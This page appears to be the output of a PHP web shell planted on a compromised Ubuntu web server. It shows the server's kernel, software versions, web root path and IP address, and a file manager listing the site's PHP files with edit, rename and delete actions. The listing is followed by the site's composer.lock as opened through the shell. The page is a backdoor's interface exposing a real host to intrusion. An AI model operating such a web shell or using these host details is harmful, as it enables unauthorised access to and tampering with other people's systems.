NG4R3P
Linux backups 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
  SOFT : Apache/2.4.18 (Ubuntu) PHP : 7.2.34-8+ubuntu16.04.1+deb.sury.org+1
/var/www/tbforte/
138.68.56.76

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
images dir drwxrwxr-x 2019-12-09 13:53 R D
js dir drwxrwxr-x 2019-12-11 00:25 R D
modules dir drwxrwxr-x 2020-02-05 16:44 R D
old dir drwxrwxr-x 2019-07-25 20:38 R D
psd dir drwxrwxr-x 2019-12-09 13:53 R D
vendor dir drwxrwxr-x 2019-12-09 13:53 R D
.htaccess 0.201 KB -rw-rw-r-- 2019-06-27 09:45 R E G D
404.php 0.051 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
composer.json 0.148 KB -rw-r--r-- 2019-12-11 00:25 R E G D
composer.lock 44.214 KB -rw-r--r-- 2019-12-11 00:25 R E G D
config.php 0.919 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
contentful.php 0.683 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
error.log 0 KB -rw-r--r-- 2019-12-11 00:25 R E G D
footer.php 7.035 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
form-contato.php 3.246 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
form-reclamacao.php 2.146 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
form-recrutamento.php 2.013 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
function.php 2.164 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
header.php 7.332 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
home-mobile.php 1.088 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
index.php 3.172 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
info.php 0.021 KB -rw-rw-r-- 2019-07-26 12:23 R E G D
robots.txt 0.027 KB -rw-rw-r-- 2020-07-09 14:30 R E G D
send.php 5.206 KB -rw-rw-r-- 2020-02-05 17:48 R E G D
single-noticia.php 2.739 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
sitemap.xml 0.979 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
style.css 44.582 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
style.min.css 32.993 KB -rw-rw-r-- 2019-12-11 00:25 R E G D
tecban.zip 15.304 KB -rw-r--r-- 2020-02-07 15:44 R E G U D
REQUEST EXIT
{ "_readme": [ "This file locks the dependencies of your project to a known state", "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies", "This file is @generated automatically" ], "content-hash": "723e9a9ae2c4a8322fd4c0df687b9770", "packages": [ { "name": "cache/adapter-common", "version": "1.1.0", "source": { "type": "git", "url": "https://github.com/php-cache/adapter-common.git", "reference": "6320bb5f5574cb88438059b59f8708da6b6f1d32" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/php-cache/adapter-common/zipball/6320bb5f5574cb88438059b59f8708da6b6f1d32", "reference": "6320bb5f5574cb88438059b59f8708da6b6f1d32", "shasum": "" }, "require": { "cache/tag-interop": "^1.0", "php": "^5.6 || ^7.0", "psr/cache": "^1.0", "psr/log": "^1.0", "psr/simple-cache": "^1.0" }, "require-dev": { "cache/integration-tests": "^0.16", "phpunit/phpunit": "^5.7.21" }, "type": "library", "extra": { "branch-alias": { "dev-master": "1.1-dev" } }, "autoload": { "psr-4": { "Cache\\Adapter\\Common\\": "" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "authors": [ { "name": "Aaron Scherer", "email": "aequasi@gmail.com", "homepage": "https://github.com/aequasi" }, { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://github.com/Nyholm" } ], "description": "Common classes for PSR-6 adapters", "homepage": "http://www.php-cache.com/en/latest/", "keywords": [ "cache", "psr-6", "tag" ], "time": "2018-07-08T13:04:33+00:00" }, { "name": "cache/hierarchical-cache", "version": "1.0.0", "source": { "type": "git", "url": "https://github.com/php-cache/hierarchical-cache.git", "reference": "97173a5115765f72ccdc90dbc01132a3786ef5fd" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/php-cache/hierarchical-cache/zipball/97173a5115765f72ccdc90dbc01132a3786ef5fd", "reference": "97173a5115765f72ccdc90dbc01132a3786ef5fd", "shasum": "" }, "require": { "cache/adapter-common": "^1.0", "php": "^5.6 || ^7.0", "psr/cache": "^1.0" }, "require-dev": { "phpunit/phpunit": "^5.7.21" }, "type": "library", "extra": { "branch-alias": { "dev-master": "1.0-dev" } }, "autoload": { "psr-4": { "Cache\\Hierarchy\\": "" }, "exclude-from-classmap": [ "/Tests/" ] }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "authors": [ { "name": "Aaron Scherer", "email": "aequasi@gmail.com", "homepage": "https://github.com/aequasi" }, { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://github.com/Nyholm" } ], "description": "A helper trait and interface to your PSR-6 cache to support hierarchical keys.", "homepage": "http://www.php-cache.com/en/latest/", "keywords": [ "cache", "hierarchical", "hierarchy", "psr-6" ], "time": "2017-07-16T21:58:17+00:00" }, { "name": "cache/tag-interop", "version": "1.0.0", "source": { "type": "git", "url": "https://github.com/php-cache/tag-interop.git", "reference": "c7496dd81530f538af27b4f2713cde97bc292832" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/php-cache/tag-interop/zipball/c7496dd81530f538af27b4f2713cde97bc292832", "reference": "c7496dd81530f538af27b4f2713cde97bc292832", "shasum": "" }, "require": { "php": "^5.5 || ^7.0", "psr/cache": "^1.0" }, "type": "library", "extra": { "branch-alias": { "dev-master": "2.0-dev" } }, "autoload": { "psr-4": { "Cache\\TagInterop\\": "" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "authors": [ { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://github.com/Nyholm" }, { "name": "Nicolas Grekas", "email": "p@tchwork.com", "homepage": "https://github.com/nicolas-grekas" } ], "description": "Framework interoperable interfaces for tags", "homepage": "http://www.php-cache.com/en/latest/", "keywords": [ "cache", "psr", "psr6", "tag" ], "time": "2017-03-13T09:14:27+00:00" }, { "name": "cache/void-adapter", "version": "1.0.0", "source": { "type": "git", "url": "https://github.com/php-cache/void-adapter.git", "reference": "a0554f661cf9f1498a2afe72d077f3c35d797161" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/php-cache/void-adapter/zipball/a0554f661cf9f1498a2afe72d077f3c35d797161", "reference": "a0554f661cf9f1498a2afe72d077f3c35d797161", "shasum": "" }, "require": { "cache/adapter-common": "^1.0", "cache/hierarchical-cache": "^1.0", "php": "^5.6 || ^7.0", "psr/cache": "^1.0", "psr/simple-cache": "^1.0" }, "provide": { "psr/cache-implementation": "^1.0" }, "require-dev": { "cache/integration-tests": "^0.16", "phpunit/phpunit": "^5.7.21" }, "type": "library", "extra": { "branch-alias": { "dev-master": "1.0-dev" } }, "autoload": { "psr-4": { "Cache\\Adapter\\Void\\": "" }, "exclude-from-classmap": [ "/Tests/" ] }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "authors": [ { "name": "Aaron Scherer", "email": "aequasi@gmail.com", "homepage": "https://github.com/aequasi" }, { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://github.com/Nyholm" } ], "description": "A PSR-6 cache implementation using Void. This implementation supports tags", "homepage": "http://www.php-cache.com/en/latest/", "keywords": [ "cache", "psr-6", "tag", "void" ], "time": "2017-07-16T21:09:25+00:00" }, { "name": "contentful/contentful", "version": "4.1.1", "source": { "type": "git", "url": "https://github.com/contentful/contentful.php.git", "reference": "b0b77f9b0d4640af48f70748e73971e9e2d58dce" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/contentful/contentful.php/zipball/b0b77f9b0d4640af48f70748e73971e9e2d58dce", "reference": "b0b77f9b0d4640af48f70748e73971e9e2d58dce", "shasum": "" }, "require": { "cache/void-adapter": "^1.0", "contentful/core": "^2.1.1", "contentful/rich-text": "^1.2", "php": "^7.0", "psr/cache": "^1.0", "symfony/console": "~2.7|~3.0|~4.0", "symfony/filesystem": "~2.7|~3.0|~4.0" }, "require-dev": { "cache/array-adapter": "^1.0", "php-vcr/phpunit-testlistener-vcr": "3.0.0|^3.2", "phpunit/phpunit": "^6.0|^7.0" }, "suggest": { "symfony/cache": "A PSR-6 compatible cache component" }, "bin": [ "bin/contentful" ], "type": "library", "extra": { "branch-alias": { "dev-master": "4.2.0-dev" } }, "autoload": { "psr-4": { "Contentful\\Delivery\\": "src/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "description": "SDK for the Contentful Content Delivery API", "time": "2019-01-18T16:34:34+00:00" }, { "name": "contentful/core", "version": "2.2.5", "source": { "type": "git", "url": "https://github.com/contentful/contentful-core.php.git", "reference": "81e3d550f80c0e5e3f39c8b4abe9833eaf55865c" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/contentful/contentful-core.php/zipball/81e3d550f80c0e5e3f39c8b4abe9833eaf55865c", "reference": "81e3d550f80c0e5e3f39c8b4abe9833eaf55865c", "shasum": "" }, "require": { "ext-json": "*", "ext-mbstring": "*", "guzzlehttp/guzzle": "^6.3", "guzzlehttp/psr7": "^1.4", "jean85/pretty-package-versions": "^1.2", "php": "^7.0", "psr/http-message": "^1.0", "psr/log": "^1.0" }, "require-dev": { "monolog/monolog": "^1.23", "phpunit/phpunit": "^6.0|7.0", "symfony/finder": "^3.0|^4.0" }, "type": "library", "extra": { "branch-alias": { "dev-master": "2.3.0-dev" } }, "autoload": { "psr-4": { "Contentful\\Core\\": "src" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "description": "Foundation library for Contentful PHP SDKs", "time": "2019-01-25T11:59:16+00:00" }, { "name": "contentful/rich-text", "version": "1.2.0", "source": { "type": "git", "url": "https://github.com/contentful/rich-text.php.git", "reference": "620ce3572181978d0a6dc930c782127afab5b68b" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/contentful/rich-text.php/zipball/620ce3572181978d0a6dc930c782127afab5b68b", "reference": "620ce3572181978d0a6dc930c782127afab5b68b", "shasum": "" }, "require": { "contentful/core": "^2.0", "ext-json": "*", "php": "^7.0" }, "require-dev": { "league/plates": "^3.3", "phpunit/phpunit": "^6.5|^7.3", "symfony/finder": "^3.0|^4.0", "twig/twig": "^2.5" }, "suggest": { "league/plates": "For integration with the Plates templating engine", "twig/twig": "For integration with the Twig templating engine" }, "type": "library", "extra": { "branch-alias": { "dev-master": "1.2.0-dev" } }, "autoload": { "psr-4": { "Contentful\\RichText\\": "src/" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "MIT" ], "description": "Utilities for the Contentful Rich Text", "time": "2018-10-31T14:49:55+00:00" }, { "name": "guzzlehttp/guzzle", "version": "6.3.3", "source": { "type": "git", "url": "https://github.com/guzzle/guzzle.git", "reference": "407b0cb880ace85c9b63c5f9551db498cb2d50ba" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/guzzle/guzzle/zipball/407b0cb880ace85c9b63c5f9551db498cb2d50ba", "reference": "407b0cb880ace85c9b63c5f9551db498cb2d50ba", "shasum": "" }, "require": { "guzzlehttp/promises": "^1.0", "guzzlehttp/psr7": "^1.4", "php": ">=5.5" }, "require-dev": { "ext-curl": "*", "phpunit/phpunit": "^4.8.35 || ^5.7 || ^6.4 || ^7.0", "psr/log": "^1.0" }, "suggest": { "psr/log": "Required for using the Log middleware" }, "type": "library", "extra": { "branch-alias": { "dev-master": "6.3-dev" } }, "autoload": { "files": [ "src/functions_include.php" ], "psr-4": { "GuzzleHttp\\": "src/" } }, "notification-url": "htt